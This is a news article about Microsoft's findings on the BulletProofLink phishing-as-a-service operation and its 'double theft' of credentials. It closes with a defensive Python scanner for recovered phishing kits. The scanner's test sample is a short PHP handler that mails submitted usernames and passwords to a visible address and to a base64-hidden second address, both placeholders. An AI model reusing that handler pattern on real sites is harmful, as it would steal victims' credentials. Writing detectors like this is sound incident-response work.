Microsoft Warns of Large-Scale Phishing-as-a-Service




Microsoft has lifted the veil on a large-scale phishing-as-a-service (PhaaS) operation that involves selling phishing kits and email templates as well as providing hosting and automated services at a low cost, thus allowing cyber actors to purchase phishing campaigns and deploy them with minimal effort.

“With over 100 phishing models available that mimic well-known brands and services, Operation BulletProofLink is responsible for many phishing campaigns impacting businesses today,” said the Microsoft 365 Defender Threat Intelligence Team in a report released Tuesday.

“BulletProofLink (also referred to as BulletProftLink or Anthrax by its operators in various websites, advertisements and other promotional materials) is used by several groups of attackers in business models based on a one-time or monthly subscription, creating a constant revenue stream for its operators.”

The tech giant said it discovered the operation during its investigation of a credential phishing campaign that used the BulletProofLink phishing kit on sites controlled by attackers or on sites provided by BulletProofLink as part of their service. The existence of the operation was first made public by OSINT Fans in October 2020.

Phishing-as-a-service differs from traditional phishing kits in that, unlike the latter, which are sold as one-time payments for access to packaged files containing ready-to-use email phishing templates, it is subscription-based and follows a software-as-a-service model, while also expanding capabilities to include integrated site hosting, email delivery and credential theft.

Believed to have been active since at least 2018, BulletProofLink is known to operate an online portal to advertise their toolset for up to $800 per month and allow cybercriminal gangs to sign up and pay for the service. Customers can also get a 10% discount if they choose to subscribe to their newsletter, not to mention paying between $80 and $100 for credential phishing templates that allow them to steal credentials entered by unsuspecting victims upon clicking a malicious URL in the email message.


Disturbingly, stolen credentials are not only sent to attackers, but also to BulletProofLink operators using a technique called ‘double theft’ in a modus operandi that mirrors the double extortion attacks used by ransomware gangs.

“With phishing kits it is trivial for operators to include a secondary location for sending credentials and hope that the buyer of the phishing kit does not modify the code to remove it,” the researchers said. “This is true for the BulletProofLink phishing kit, and in cases where attackers using the service received credentials and logs after a week instead of running campaigns themselves, the PhaaS operator has retained control over all of the credentials it resells.”
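
An analyst who recovers a kit during takedown or incident response can check it for the secondary credential destination the researchers describe. The Python sketch below is an added example, not code from Microsoft's report or from the BulletProofLink kit; the sample PHP, the addresses and the assumption that a hidden recipient appears as a plain or base64-encoded string literal are constructed for illustration.

```python
import base64
import binascii
import re

EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
STRING_LITERAL = re.compile(r"""(["'])((?:\\.|(?!\1).)*)\1""")
BASE64_LIKE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def find_recipients(php_source):
    """Map every e-mail address found in the kit's string literals to how
    it was stored: 'plain', or 'base64' if it only appears after decoding."""
    found = {}
    for _quote, literal in STRING_LITERAL.findall(php_source):
        for addr in EMAIL.findall(literal):
            found.setdefault(addr.lower(), "plain")
        if BASE64_LIKE.fullmatch(literal):
            try:
                decoded = base64.b64decode(literal, validate=True).decode("utf-8")
            except (binascii.Error, UnicodeDecodeError):
                continue  # not valid base64 text, ignore
            for addr in EMAIL.findall(decoded):
                found[addr.lower()] = "base64"
    return found


def report(php_source):
    """Summarise credential destinations; more than one, or any encoded
    one, is the 'double theft' pattern worth a manual look."""
    recipients = find_recipients(php_source)
    return {
        "recipients": recipients,
        "hidden": sorted(a for a, how in recipients.items() if how == "base64"),
        "multiple_destinations": len(recipients) > 1,
    }


# Constructed sample: a kit result handler with a visible buyer address
# and a second, encoded recipient (both addresses are placeholders).
SAMPLE_KIT = '''<?php
$to = "buyer@example.com";
$msg = "user=" . $_POST['u'] . " pass=" . $_POST['p'];
mail($to, "log", $msg);
mail(base64_decode("%s"), "log", $msg);
''' % base64.b64encode(b"operator@example.net").decode()

if __name__ == "__main__":
    print(report(SAMPLE_KIT))
```

Every address the script reports is a place where harvested credentials may have been sent, which matters when scoping password resets and abuse notifications after a campaign.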


